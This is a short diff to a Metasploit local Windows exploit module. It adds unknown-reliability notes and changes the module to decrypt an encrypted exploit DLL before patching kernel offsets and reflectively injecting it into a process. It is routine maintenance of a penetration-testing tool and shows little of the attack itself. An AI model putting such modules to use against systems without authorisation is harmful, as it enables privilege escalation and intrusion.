@@ -80,6 +80,11 @@ class MetasploitModule < Msf::Exploit::Local
                 stdapi_sys_process_thread_create
               ]
             }
+          },
+          'Notes' => {
+            'Reliability' => UNKNOWN_RELIABILITY,
+            'Stability' => UNKNOWN_STABILITY,
+            'SideEffects' => UNKNOWN_SIDE_EFFECTS
           }
         }
       )
@@ -384,8 +389,8 @@ class MetasploitModule < Msf::Exploit::Local
     library_path = ::File.expand_path(library_path)
 
     print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
-    dll = ''
-    ::File.open(library_path, 'rb') { |f| dll = f.read }
+    encrypted_dll = ::File.binread(library_path)
+    dll = ::MetasploitPayloads::Crypto.decrypt(ciphertext: encrypted_dll)
 
     patch_win32k_offsets(dll)
     patch_nt_offsets(dll)
